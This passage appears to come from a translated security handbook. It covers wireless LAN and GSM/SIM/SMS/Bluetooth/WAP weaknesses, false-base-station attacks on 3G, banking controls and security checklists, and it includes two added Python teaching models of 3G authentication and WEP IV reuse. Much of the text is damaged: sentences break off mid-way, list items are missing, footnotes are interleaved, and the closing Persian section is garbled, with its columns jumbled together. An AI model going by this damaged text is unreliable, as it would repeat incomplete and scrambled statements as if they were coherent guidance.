7. Misconfiguration: any device, service or application that is not configured correctly puts the whole network at risk. Many wireless devices and applications are set up by default to accept any request for service or access. This means that any arbitrary mobile client can request a telnet or ftp session and receive a reply.

8. Brute force attacks: most wireless access points use a single shared key or password for all the devices on the network. This leaves wireless networks exposed to brute force attacks (for example, dictionary-based ones).

153 This classification comes from a member of the CERT analysis center.
154 Insertion Attacks
155 Mobile Access Point
156 Session Hijacking
157 Broadcasting
158 Flooding
159 Encryption
160 Wired Equivalent Privacy
161 Dave Thomas

War Driving

Industrial espionage and white-collar crime have reached their peak with the advance of new technologies. War dialing, which means calling every telephone number belonging to an organization in order to find the numbers of its modems, has given way to war driving. This new term means searching for the wireless LANs of businesses and recording their network traffic with a laptop. According to Dave Thomas,[161] a senior investigator in the FBI's computer crime division, war driving is a phenomenon that is
spreading and threatens the security of every company and institution that has a wireless LAN.

When setting up and deploying a wireless LAN, the network administrator may see that laptops can connect to the network only within a limited distance of the access points, and conclude that the network's signals cannot be reached from any further away. That assumption is wrong. The signals can in fact be received thousands of meters away, as long as nothing deflects or interrupts them. The mistaken reasoning comes from the fact that a laptop's small antenna cannot pick up weak signals; with an external antenna the range of the signals can be increased. The wireless part of a network is usually such that an intruder needs no physical access to anything in order to reach its traffic. That is why these networks are weak against attacks such as message theft, message alteration, and jamming between messages.

These issues show why security in wireless networks deserves attention. Each of the weaknesses above can be minimized or eliminated through proper use of security policies and practices, network design, security applications, and correct configuration of security controls. The final chapters of Part Three cover how to secure wireless LANs.

D. The mobile phone standard in Europe: GSM

GSM is the most widespread and fastest-growing digital mobile phone standard in use in the world. There are currently close to 600 million GSM subscribers worldwide, a figure that is more than two-thirds of all the mobile devices in existence.[162] That number is growing at a rate of four new users per second. GSM coverage spans every continent, and the technology is used by 400 service providers in more than 170 countries. Yet this is only the beginning of the wireless technology revolution. Industry researchers predict that there will be about 1.4 billion GSM users by the end of 2005. Every GSM phone contains a small smart card that stores the phone's details and is known as the Subscriber Identity Module (SIM).[163] The SIM has to keep those details confidential and encrypted, so the SIM card can be seen both as a strength and as a security weakness of GSM technology.

GSM weaknesses

SIM card vulnerabilities

In American and European GSM systems the method of accessing the network is the same. Removable smart cards in the phones (SIM cards) hold contact numbers, account information, and add-on software such as a web browser. The data stored on the cards is encrypted, but the COMP128 algorithm used for this has already been broken, so the cards are not safe against cloning (making an identical copy of the card). War driving is not a serious danger for mobile phone subscribers who use the GSM standard. Regardless of the frequency band, mobile phone signals can easily be interrupted by jamming. There is a very well-known method, using a personal computer, for obtaining the key of an encrypted GSM conversation[164] in less than a second.
The security of GSM technology depends on the circumstances. A SIM card can be cloned. It can also be broken into, because its sensitive algorithms have been broken. This last problem can also leave GSM phone conversations completely insecure.

A bank's use of GSM technology raises other problems as well. For example, if a remote ATM cannot reach a genuine cell tower, it can be tricked into connecting to a fake one. This gives the intruder the ability to control the transactions carried out at that ATM.

SMS vulnerability

GSM also provides the Short Message Service (SMS).[165] SMS has many uses in a GSM system, including voicemail notifications, updating the subscriber's SIM, sending short text messages, and communicating with e-mail gateways. Useful as these services are, they bring new security risks to the network. SMS is a store-and-forward messaging service that is inherently insecure: all messages are exchanged as unencrypted plain text, and they are also stored unencrypted at the SMS center before being forwarded to their destination. Another problem with SMS is delay in delivery; time-critical transactions cannot rely on this service. In addition, there is a great deal of free software that can be used to forge SMS messages, to flood handsets and SMS centers with SMS bombs, or to craft SMS packets that crash the software on most handsets.

SIM Toolkit (STK)[166] technology can be used to encrypt SMS. STK, however, is a transport layer[167] security mechanism and cannot guarantee end-to-end confidentiality.[168] Another way of improving SMS security is for customers to check an agreed fragment of the message personally, in order to validate the whole message and the service provider, and consequently for customers' registered phone numbers to be checked.

165 Short Message Service
166 SIM Toolkit Technology
167 Transport Layer
168 End-to-End Confidentiality
169 General Packet Radio Service

GPRS vulnerability

GPRS[169] is an IP-based service that guarantees a permanent connection to the Internet. Its main problem is that it still relies on SMS for WAP requests. A forged SMS packet can be sent to a phone and open a fake website, tricking users into entering their details in a form that they believe to be secure but that is in fact fake. Many GPRS-capable phones also support Bluetooth. Every Bluetooth device has a unique address that lets the user place some degree of trust in the person at the other end of the connection. Once that identifier has been associated with a user, the user's activities can be recorded by following the messages and checking their identifier. Bluetooth devices begin a connection with an initialization process that uses a PIN for authentication. Although some devices let you type in the PIN, it can also be stored in the memory of an electronic device or on a hard disk. If the device is not physically secure, this can cause many problems. Moreover, most PINs are four-digit numbers, and in perhaps half of all cases the number is 0000.

Bluetooth security depends on the encryption key being kept as a shared secret among the members of the network. But imagine that you and I are talking on our Bluetooth-enabled mobile phones. To secure the conversation, I encrypt the conversation data with your key. A little later one of your friends calls you, and you use your key again. Knowing your key, and using a forged address, I
can work out the type of encryption and listen in on your conversation. I can also pass myself off as you, or as someone who is talking with you. Bluetooth therefore authenticates only devices, not users.

WAP weaknesses

The weakness shared by all of the devices examined, whatever the type of network, is the Wireless Application Protocol (WAP)[170] standard, which is made up of the Wireless Markup Language (WML)[171] and the Handheld Device Markup Language (HDML).[172] To make things easier, developers do their best to design scenarios in which the user has to enter the shortest possible input when using different services, for example the digits typed in as a credit card number or a personal account number. This means that most of this data is still stored on the server, while the handheld device holds only a cookie containing the password, which for tasks such as online shopping or transferring funds often requires only a PIN and sometimes not even that. Securing the exchanges between devices on a wireless network is therefore left to another standard, Wireless Transport Layer Security (WTLS).[173]

Unless the mobile 128-bit SSL[174] standard or the IPSec protocol (which most handsets do not support because of limited bandwidth and processing power) is used, there will always be a weak security link somewhere in the network that can be abused. Even then, security weaknesses inside the device (as opposed to the communication channel) will remain, so the security of the connection is easily compromised. GSM uses WAP and WTLS, which is the equivalent of SSL but with a weaker encryption algorithm. WTLS is not compatible with SSL, which is an industry standard. Wireless messages go to a gateway and from there enter a wired network to be routed to their final destination. At that gateway the WTLS message is converted to SSL. The message is decrypted at the gateway for a few seconds, and that leaves the whole connection vulnerable to message theft.

E. Security solutions for GSM

GSM's inherent flaws are not easy to fix. Phones and PDAs that use GSM technology are generally unable to run protective software. Although GSM is not vulnerable to war driving the way its American counterpart, the 802.11 standard, is, it has several fundamental weaknesses. The 802.11 standard is meant for computers rather than handsets, so its security can be improved far more effectively than that of GSM. Virtual private networks (VPNs) are the common ground between the vulnerabilities of the two standards, and using a VPN is usually regarded as a way of addressing the current vulnerabilities of 802.11 and GSM. Even so, in layered security no single layer can be expected to work miracles. More information on wireless network security can be found at the end of this part of the book and in Part Five (IT security and technical administrators).

F. Banking security practices

As a result of the widespread use of GSM in electronic financial services, a number of control and security standards have emerged that financial institutions must take into account if they use wireless access in payment services.

Third-party payments

As a general rule, banks should authenticate their customers directly in wireless financial transactions. Some customers may give the bank a standing authority to debit their account and credit the accounts of certain third parties. Such arrangements can be made through direct debit authorization agreements.[175]

170 Wireless Application Protocol
171 Wireless Markup Language
172 Handheld Device Markup Language
173 Wireless Transport Layer Security
174 Secure Socket Layer
175 Direct Debit Authorization Agreements
However, when such agreements are acted upon, third parties must not be able to obtain or store customers' banking identifiers (IDs and PINs).

Stored value accounts

Stored value accounts (SVA)[176] are used by customers who pay money into them periodically. An SVA can reside on a mobile device. No bank account should be accessed while a payment is being made. To transfer funds from a bank account to an SVA, the holder of that bank account must carry out the transfer in person.

Wireless proximity payments

Interactive voice response

Mobile interactive voice response (Mobile IVR)[178] services are vulnerable to eavesdropping. IVR systems should not be used for high-value or high-risk services. All IVR connections, including the caller's phone number and the sequence of transactions carried out by the customer, must be logged, but these logs must never contain the PIN or the customer's authentication data.

Customer education

Banks should educate the users of wireless electronic financial services in the following ways:

• Customers should be advised to use different PINs for different services.
• Customers should be given instructions on configuring their mobile devices so that they can use mobile banking and payment applications safely.
• Customers should be given the information they need about handling disputes, the reporting procedures, and the expected time for resolving complaints.

Looking ahead: third-generation technology

The third generation of wireless technology, known as 3G for short, refers to advances in wireless communication across various standards. The initial aim of this effort is to raise the transmission speed from

3G security is designed on the basis of GSM security, with the following changes:

• One change was made to defeat an attack known as the false base station.[179] In this security mechanism a sequence number is added to the authentication data, which ensures that the mobile device is able to identify the network.
• The length of the cipher key has been increased so that stronger encryption algorithms can be used.
• Mechanisms have been included to improve security inside networks and on the links between them.
• Security is now based in the switch instead of the base station (as in GSM), so the links between the base station and the switch are protected.
• The mechanisms for the integrity of the terminal identity (IMEI)[180] have been redesigned, replacing what existed in GSM.
• The authentication algorithm is not defined, but guidance is given for choosing one.
• When roaming between networks, for example between GSM and 3GPP, only the level of support provided by the smart card applies. A GSM smart card in a 3GPP network is therefore still unprotected against the false base station attack.

The third-generation system is far more secure than its GSM counterpart. As noted, however, the intelligence and ingenuity of attackers should never be underestimated. From a theoretical point of view, serious attacks are still possible in third-generation networks; they are outlined below.

Trusting a false base station

This attack requires a modified base station or mobile station, and exploits the possibility that the user connects to a false base station. A false base station can act at times as a repeater and at times as an amplifier for the requests exchanged between the network and the user, changing the requests or messages of interest along the way. The security architecture cannot prevent the messages exchanged between the network and the user from being tampered with. Protecting the integrity of critical network messages can, however, help prevent some denial-of-service attacks that work by changing message contents. Here the denial-of-service attack can continue only while the intruder is active, unlike the attacks above, which carry on even after the intruder has stopped intervening. These attacks are comparable to attacks such as radio jamming, which would be very difficult to neutralize in every radio system.

Forcing unencrypted communication

This type of attack also requires a modified base station or mobile station. Once the target user trusts the false base station, the attacker contacts the victim with a phone call. The user then starts the initial setup procedure, which the attacker has put in place between the service provider's network and the user, and this causes the signalling elements to be changed so that it appears to the network as if the target user does not want to use encryption for data exchange. After authentication, the attacker cuts off the connection with the user and uses the network, on that user's subscription, to make fraudulent calls.

Protecting message integrity can prevent this kind of attack. In particular, data authentication and preventing connection requests from being sent indirectly allow the network to recognise which requests are legitimate. In addition, periodically sending integrity-protected messages during a connection helps prevent unencrypted connections from being hijacked after the connection has been set up. A connection can still be hijacked between the periodic protected messages, although this is usually of little use to intruders. In general, connections with encryption turned off are always vulnerable to a class of attacks.

We stress once again that, depending on how the technology is used, all of these attacks are theoretical. Overall, third-generation systems have advanced in terms of security technology, but supporting the security of mobile communications also requires other security measures to be observed continuously.
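The difference between GSM's one-way authentication and the sequence-numbered network token described for 3G can be made concrete with a small model. This is an added example, not code from the handbook: the class names, the HMAC-SHA256 function and the token layout are assumptions chosen for illustration and do not reproduce the real 3GPP algorithms or message fields.

```python
"""Toy model: GSM-style one-way authentication vs 3G-style mutual authentication.

Assumptions (not from the handbook): HMAC-SHA256 stands in for the operator's
authentication functions, and the token is simply SQN || MAC.
"""
import hashlib
import hmac
import os

SQN_LEN = 6  # bytes used for the sequence number in this model


class AuthError(Exception):
    """Raised by a handset that refuses a network challenge."""


def _prf(key: bytes, label: bytes, *fields: bytes) -> bytes:
    # Keyed function shared by the SIM and the home network.
    return hmac.new(key, label + b"".join(fields), hashlib.sha256).digest()


class HomeNetwork:
    """Genuine network: it knows the subscriber key stored in the SIM."""

    def __init__(self, key: bytes):
        self.key = key
        self.sqn = 0

    def challenge_3g(self):
        # Returns (RAND, token, expected response) for one authentication run.
        self.sqn += 1
        rand = os.urandom(16)
        sqn = self.sqn.to_bytes(SQN_LEN, "big")
        token = sqn + _prf(self.key, b"MAC", rand, sqn)
        return rand, token, _prf(self.key, b"RES", rand)


class GsmHandset:
    """One-way model: the phone proves itself but cannot check the network."""

    def __init__(self, key: bytes):
        self.key = key

    def respond(self, rand: bytes) -> bytes:
        # Any station that sends a RAND gets a response.
        return _prf(self.key, b"RES", rand)


class ThreeGHandset:
    """Mutual model: the phone checks the network token before answering."""

    def __init__(self, key: bytes):
        self.key = key
        self.highest_sqn = 0

    def respond(self, rand: bytes, token: bytes) -> bytes:
        sqn, mac = token[:SQN_LEN], token[SQN_LEN:]
        if not hmac.compare_digest(mac, _prf(self.key, b"MAC", rand, sqn)):
            raise AuthError("token not signed with the subscriber key")
        value = int.from_bytes(sqn, "big")
        if value <= self.highest_sqn:
            raise AuthError("sequence number already used")
        self.highest_sqn = value
        return _prf(self.key, b"RES", rand)


def _attempt(handset: ThreeGHandset, rand: bytes, token: bytes) -> str:
    try:
        handset.respond(rand, token)
        return "accepted"
    except AuthError as exc:
        return "rejected: " + str(exc)


def run_scenarios() -> dict:
    key = os.urandom(16)  # constructed subscriber key
    network = HomeNetwork(key)
    results = {}

    # GSM model: a station that does not know the key still gets an answer.
    results["gsm_unknown_station"] = (
        "accepted" if GsmHandset(key).respond(os.urandom(16)) else "rejected"
    )

    phone = ThreeGHandset(key)
    rand, token, expected = network.challenge_3g()
    results["3g_genuine"] = (
        "accepted" if hmac.compare_digest(phone.respond(rand, token), expected)
        else "rejected"
    )

    # A station without the key can only guess the MAC.
    forged = (1000).to_bytes(SQN_LEN, "big") + os.urandom(32)
    results["3g_forged"] = _attempt(phone, os.urandom(16), forged)

    # Replaying a genuine challenge captured earlier fails the freshness check.
    results["3g_replayed"] = _attempt(phone, rand, token)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:22s} {outcome}")
```

The model covers only the initial authentication step; it does not address the roaming case above, where a GSM smart card in a 3GPP network keeps the weaker behaviour.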
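Item 4 in the list of wireless risks earlier in this part says that WEP's encryption method and initialization vectors are weak. The following added example (not from the handbook) shows why a short IV matters, under these assumptions: a 24-bit IV prepended to the shared key as the RC4 seed, IVs chosen at random, and the integrity check value and frame headers left out. The sample key and messages are constructed.

```python
"""Simplified WEP model: IV reuse means keystream reuse."""
import math
import os
from collections import defaultdict

IV_BITS = 24
IV_LEN = IV_BITS // 8


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher (key scheduling followed by keystream XOR)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || ciphertext; the IV travels in the clear."""
    return iv + rc4(iv + shared_key, plaintext)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_collision_probability(frames: int, iv_bits: int = IV_BITS) -> float:
    """Birthday approximation: chance that two of `frames` random IVs match."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def reused_ivs(frames) -> dict:
    """Audit helper: map each IV seen more than once to the frame indexes."""
    seen = defaultdict(list)
    for index, frame in enumerate(frames):
        seen[frame[:IV_LEN]].append(index)
    return {iv: idx for iv, idx in seen.items() if len(idx) > 1}


def keystream_reuse_demo() -> dict:
    key = os.urandom(13)                      # constructed 104-bit shared key
    p1 = b"TRANSFER 0100 TO ACCOUNT A"        # constructed messages
    p2 = b"BALANCE REQUEST FOR USER B"
    c1 = wep_encrypt(key, b"\x00\x00\x01", p1)
    c2 = wep_encrypt(key, b"\x00\x00\x01", p2)   # same IV, same keystream
    c3 = wep_encrypt(key, b"\x00\x00\x02", p1)   # fresh IV
    # With a shared IV the keystream cancels: C1 xor C2 == P1 xor P2,
    # so the key is not needed to learn how the two plaintexts differ.
    leaked = xor(c1[IV_LEN:], c2[IV_LEN:])
    return {
        "leak_equals_plaintext_xor": leaked == xor(p1, p2),
        "reused": reused_ivs([c1, c2, c3]),
    }


if __name__ == "__main__":
    print(keystream_reuse_demo())
    for n in (1000, 5000, 20000):
        print(n, "frames ->", round(iv_collision_probability(n), 3))
```

On a busy network a few thousand frames pass quickly, which is why a per-frame value this short cannot keep keystreams unique for long.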
Chapter Eleven

Best practices: creating a security culture

Overview

Up to this point in Part Three, the role of security and the way it works in different organizations, including small and medium-sized organizations, non-profit institutions, schools and government offices, has been

Best practices:[182] twelve layers of e-security

Managing security risk can be seen as a two-sided process. The first stage is risk assessment, which has three main parts: identifying and gathering the assets, analysing each asset and determining its value, and determining, in order of priority, how critical each asset is. The second step is to draw up an approach to managing the risks. The main parts of this stage are developing and implementing policies and working procedures, training users (both employees and customers), and review and monitoring to assure and control quality. One sensible view puts it this way: "Accept that you may become the target of an attack, and plan for your own survival."
2. Risk management - a broad concept, based on CERT's OCTAVE model, for managing assets and the risks associated with them.

3. Access controls and authentication - checking that a computer or user is authorized before granting access to the information requested. During this process the user enters a name or account number (identification data) followed by a password (authentication data). Access controls are the first line of defense and can be based on passwords, tokens, biometrics, or a public key infrastructure.

4. Firewalls - a system, or a combination of several systems, that draws a clear boundary between two or more networks.

5. Active content filtering - at the level of web browsers, anything that is unsuitable for the workplace or that conflicts with approved policies needs to be filtered out.

6. Intrusion detection system (IDS) - a system dedicated to identifying intrusions or intrusion attempts, whether they are carried out manually or with the help of software expert systems. The system uses log files[184] and other network information. Monitoring methods vary widely, depending on factors such as the types of attack the system must be able to defend against, the origins of intrusion, the types of assets, and the degree of concern about each threat.

7. Virus scanners - worms, Trojans and viruses are all tools for carrying out attacks. A virus is a program that can spread itself by infecting the programs on a system. Trojans do not spread themselves or attach themselves to other files. Virus scanners find malicious and harmful programs and disable them.

8. Encryption - encryption algorithms are used to protect information that is in transit or exposed to theft (on storage media, for example backup media or a laptop).

9. Vulnerability testing - the purpose of this test is to obtain information about the vulnerabilities that exist in a computer or network and to use that information to get past the usual authentication barriers and ultimately reach the various resources of that computer or network.

10. Proper system administration - this should be complemented by a list of the common administration errors that typically occur in financial institutions or companies, together with a list of best practices.

11. Policy management software - a software program is needed to check that the policies and procedures drawn up for employees' use of computers are being carried out correctly.

12. Incident response plan (IRP)[185] and business continuity plan (BCP)[186] - this is the principal document in which the organization states how it identifies a security incident, responds to it, and repairs the damage. Having an IRP and testing it periodically is one of the most important instruments for establishing security.

Executive support checklist[187]

As we saw in earlier chapters, awareness of security matters is key to creating an environment in which employees are best able to work together to protect their organization. Employees are influenced by the way managers treat the security rules and by how much they invest in security training and communication and in other related areas.

184 Log Files
185 Incident Response Plan
186 Business Continuity Plan
187 Source: ITS, Chapter Three, Executive Support, p. 50
This checklist is intended for the company executives who lead the implementation of security policies.

• Are management summaries prepared regularly? How often?
• Is there a clear line of communication from senior management down to production-line staff?
• Does everyone know what that line of communication is and where it is?
• Has responsibility for security been explicitly assigned to one manager, for example the deputy chief executive, the security manager, or another of the organization's managers?
• Has management, by presenting and enforcing the organization's security program, … and has the related budget actually been allocated to it?
• Do the administrators of all the different systems understand the importance of reporting security problems and resolving them quickly?
• Has raising security awareness been adopted as part of the organization's programs for new employees at every level, from production-line staff to senior management?
• Have the necessary steps been taken to make sure that employees at every level are aware of the company's information protection policies?
• Were the realities of the company's culture (the relationship between managers and employees) taken into account when the security policies and procedures were drawn up?
• Do employees know whom to ask for help when they run into a security problem (or are unsure of their duties)?
• Are security reviews and audits carried out regularly? Every six months? Every year?

Staff responsibilities

To promote a security culture, managers should:

• Explain what the elements of a good security program are.
• Stress that security matters greatly at every level of the organization.
• Encourage people to ask questions about security technologies and procedures.
• Ask all staff to be highly vigilant in this respect and to report any unusual activity (in the office or on the network).
• … comes first, and deliberate security breaches cannot be overlooked.

The following list is designed to help managers train staff to cooperate in securing the organization:

Security training checklist[188]

• Are managers at all levels committed to an organizational security program?
• Have they backed that commitment by investing in security training?
• Does the training program also cover the details of configuring and supporting security?
• Are there defined policies for security training?
• Are these policies complete and up to date, and are staff aware of them?

188 Source: ITS, Chapter Five, Security Training, p. 81
• Have all employees (including executives) been trained in their security responsibilities to the company?
• Is there a framework for developing and sustaining security awareness?

Risk control and management framework

In chapters two, three and four we examined common security threats (risk assessment) and described methods for analysing losses, and in the later chapters we went on to offer strategies for drawing up security policies and procedures, which strengthen the organization against attacks and accidental damage. As we saw there, a response plan includes a list of the results of a practical security evaluation of the assets and proposes a range of initial defensive measures.

The checklists below give more detail on risk assessment and loss prevention.

Risk review checklist[189]

• Has a risk assessment been carried out recently? How often is the assessment updated?
• Have systems been classified by the sensitivity of the risks (non-sensitive, sensitive, and highly sensitive)?
• Are management objectives based on security principles?
• Are regular audits carried out to test the results of the risk assessment?
• Are auditors from outside the organization used when risks need to be assessed and reduced?
• Have all employees (even managers and system administrators) been evaluated and appointed on the basis of the security objectives?

Loss prevention checklist[190]

• Do you know what you are trying to protect?
• Has management also been involved in the risk assessment?
• Are the policies written in plain language and easy to understand?
• Does everyone have access to a copy of the policies?
• Is someone personally and explicitly responsible for the policies and procedures?
• Does the person responsible for the policies attend security conferences and keep their security knowledge up to date?
• Do you carry out periodic reviews to make sure the security mechanisms are still in place?
• Are you sure that everyone who installs your systems has been trained in your company's security policies and procedures?
• Before deploying software and hardware systems, do you make sure that all known security problems have been resolved?
• Do you review the audit reports? How often?

Physical security: internal and external networks

Physical security is covered at various levels of detail in Parts Two (IT security and individual users), Three (this part) and Five (IT security and technical administrators). From a technical point of view, certain areas need to be covered from a security perspective, such as internal networks, external networks, and control of access to networks. The checklists below are designed to help protect the physical resources of a network environment.

189 Ibid., Chapter Six, Unplanned Security, p. 95
190 Ibid., Chapter Two, Innovative Security, p. 32
Internal network security checklist[191]

• Are there defined policies and procedures for configuring systems?
• Do these policies and procedures cover file access permissions, passwords and patches?
• Have you disabled unnecessary services?
• Is there a physical security policy?
• Do all users have passwords?
• Have the default accounts that exist on the system been changed?
• Is the use of the default "Guest" user accounts

• Is someone responsible for penetration testing[193] the firewall?
• Is it clear who is responsible for updating the firewall (when needed)?
• Has adequate investment been made in administering, updating and maintaining the firewall?
• Are managers aware of their own role in the security process and of the role of the people who report to them?
• Have emergency roles and responsibilities been defined clearly and formally?
• Do support staff follow defined preventive procedures?
• Does the company audit its external connections regularly in order to control them?
• Is there a specific procedure for disabling the connections of staff or contractors who have left?
• Are there specific policies and procedures for installing a firewall?
• Is there a specific policy and procedure for connecting customers to external networks?
• Are all the policies and procedures relating to connections strictly enforced?

Security audit

While an organization spends enormous amounts of time and money on drawing up security policies and procedures, training employees, and supporting its security managers and specialists, the effectiveness of those efforts also has to be assessed continually. A security audit reveals the weaknesses in the comprehensive security program that have arisen through growth and change over the life of the organization, or that for whatever reason could not be addressed. Audits can bring a further benefit: if offenders know that you are looking for them, they may limit their activity.

The most common errors that security audit procedures can identify are:

• security patches that have not been installed;
• excessive file access permissions;
• passwords that are simple and easy to guess;
• unnecessary network services left enabled; and
• firewall rules that are unclear or not enforced.

The checklist below is provided to set a baseline for security audits, whether they are carried out by the company's own staff or by outside specialists.

Audit procedures checklist[194]

• Do you have a formal audit policy?
• Have you prepared written audit procedures for testing security?
• Are audits carried out according to a regular schedule?
• Is audit software installed on all the types of operating system you run (Unix/Linux, Mac, Windows)?
• Is an adequate budget allocated for buying the audit tools that are needed?
• Do managers properly support the security audit process by making proper training available to the auditors?

Using outside resources

Finally, we recognise that the complexity of IT security may lead some organizations to use outside specialists to meet their security needs. The chapter devoted to this subject discussed in depth the points to consider when choosing a partner company, how to manage its activities, and when its activities need to be monitored closely.

The following security checklist can serve as a further resource for companies that want to use an outside contractor to carry out their security activities:

Checklist for using outside resources in security[195] (technical considerations)

• Are the connections between providers and customers (external network connections) audited regularly? How often?

194 Source: ITS, Chapter Nine, Outsourcing, p. 133
195 Source: ITS, Chapter Nine, Outsourcing, p. 133
ﻣﻈﻨﻮﻥ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ. ﺳﺎﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ:
ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﻗﺎﻋﺪﺓ ﺧﺎﺹ ﺩﻳﮕﺮ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ .۱
ﻭﺍﺟﺪ ﭼﻪ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ .ﺍﮔـﺮ ﻓﻜـﺮ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﺭﺍﻳﺎﻧﻪ
ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ ﻭ
ﻗﺎﻋﺪﺓ .۱ﭘــﻴﺶ ﺍﺯ ﻭﻗــﻮﻉ ﺳــﺮﻗﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ ﻣــﻮﺭﺩ ﺁﻥ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ
ﺑﻴﺎﻧﺪﻳﺸﻴﺪ. ﺧﻮﺍﻫﻴﺪ ﺷﺪ ،ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻭﻟﻮﻳـﺖ ﻛـﺎﻓﻲ
ﻗﺎﻋﺪﺓ .۲ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﻣﻄﻤـﺌﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑـﺮﻭﺯ ﻣـﺸﻜﻼﺕ
ﺷﻮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻬﺪﻳﺪ ﻓﻴﺰﻳﻜﻲ ﺭﺍﻳﺎﻧﻪ ،ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻣﻨﻴﺘﻲ ،ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﭘﺮﻛـﺎﺭ ﻛـﻪ ﻫـﻴﭻ ﺁﻣـﻮﺯﺵ
ﺁﺳﻴﺒﻲ ﻭﺍﺭﺩ ﻧﻤﻲﺷﻮﺩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ. ﺭﺳﻤﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﻳﺪﻩ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺎﺭﻩﻭﻗـﺖ ﻛﻨﻴـﺪ،
ﺑﺪﻭﻥ ﺷﻚ ﺑﻪ ﺍﺳﺘﻘﺒﺎﻝ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻓﺘﻪﺍﻳﺪ.
ﻗﺎﻋﺪﺓ .۳ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺍﻧﺘﺨــﺎﺏ ﻛﻨﻴــﺪ ﻛــﻪ
ﺑﺴﺎﺩﮔﻲ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳـﺎﺩ ﺑﻴﺎﻭﺭﻳـﺪ ﺍﻣـﺎ ﺣـﺪﺱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺁﻣﻮﺯﺵ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺭﻭﺍﻟﻬـﺎ .۲
ﺯﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﻣﺸﻜﻞ ﺑﺎﺷﺪ. ﺩﺧﺎﻟﺖ ﺩﻫﻴﺪ .ﺁﻳـﺎ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ
ﻧﺎﺷﻲ ﺍﺯ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ )ﻭ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻋﻤﻠﻜﺮﺩﻫـﺎﻳﻲ ﺍﺯ ﻧﻈـﺮ
ﻗﺎﻋﺪﺓ .۴ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺧﻮﺩ ﺭﺍ ﻫﻤﻮﺍﺭﻩ
ﺍﻣﻨﻴﺘﻲ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ( ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧـﺪ؟ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺻـﻮﺭﺕ
ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻣﻮﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ ﻳﺎ ﻣﺸﻜﻮﻙ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ
